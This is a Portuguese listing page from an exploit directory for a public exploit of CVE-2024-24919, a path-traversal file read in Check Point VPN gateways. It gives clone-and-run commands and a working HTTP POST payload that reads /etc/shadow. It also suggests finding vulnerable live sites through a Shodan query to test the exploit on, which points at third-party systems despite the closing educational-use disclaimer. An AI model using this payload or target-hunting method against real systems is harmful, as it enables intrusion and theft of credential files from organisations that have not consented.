Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-24919-Exploit — CVE-2024-24919 Exploit e PoC - LFI Crítico para VPN de Acesso Remoto ou Acesso Móvel. | Kitploit
Ferramentas/GitHubGitHub/rug4lo/cve-2024-24919-exploit
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de PenetraçãoAprendizado e Educação
GitHubrug4lo/cve-2024-24919-exploit

CVE-2024-24919-Exploit

CVE-2024-24919 Exploit e PoC - LFI Crítico para VPN de Acesso Remoto ou Acesso Móvel.

Ver Repositório
3há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-24919-Exploit

Visão Geral

Este repositório contém um exploit em python para o CVE-2024-24919, uma vulnerabilidade que permite ler arquivos sensíveis da página vulnerável.

Este exploit primeiro verifica se o alvo é vulnerável e, em seguida, obtém o caminho que você especificar.

Severidade: Crítica

Uso

Primeiro, clone o repositório:

root@kitploit:~
git clone https://github.com/Rug4lo/CVE-2024-24919-Exploit
cd CVE-2024-24919-Exploit

Dê permissões e execute o exploit com python3

root@kitploit:~
chmod +x exploit.py
python3 exploit.py

Em seguida, siga os passos e você obterá os dados do arquivo que especificar.

Se estiver com dificuldades, certifique-se de que a URL especificada é a principal.

✓ https://google.com

✘ https://google.com/search?client=firefox

POC (Prova de Conceito)

Primeiro, precisamos garantir que o site tenha Check Point Security Gateways com VPN de acesso remoto ou software de acesso móvel habilitado.

Neste exploit, estamos apontando para o endpoint {ip}/clients/MyCRL.

Este endpoint é vulnerável se fizermos uma requisição POST, adicionamos a string CSHELL/ e o caminho do arquivo que queremos ler usando um Path Traversal.

A requisição será algo como:

root@kitploit:~
POST /clients/MyCRL HTTP/1.1
Host: <redacted>
Content-Length: 39

aCSHELL/../../../../../../../etc/shadow

Obtemos tudo isso olhando o código fonte.

Para mais informações sobre o processo, confira este post --> https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/

Teste

Se você quiser testar essa vulnerabilidade, pode usar o Sodan para encontrar alguns sites vulneráveis, usando esta consulta no sodan

root@kitploit:~
Server: “Check Point SVN Foundation”

Referências

https://nvd.nist.gov/vuln/detail/CVE-2024-24919 https://www.cronup.com/cve-2024-24919-zeroday-critico-explotado-activamente-en-vpns-check-point/ https://www.incibe.es/incibe-cert/alerta-temprana/vulnerabilidades/cve-2024-24919

Aviso Legal

Este script é apenas para fins educacionais. Use-o com responsabilidade e apenas em sistemas para os quais você tenha permissão de acesso.

Baixar ferramenta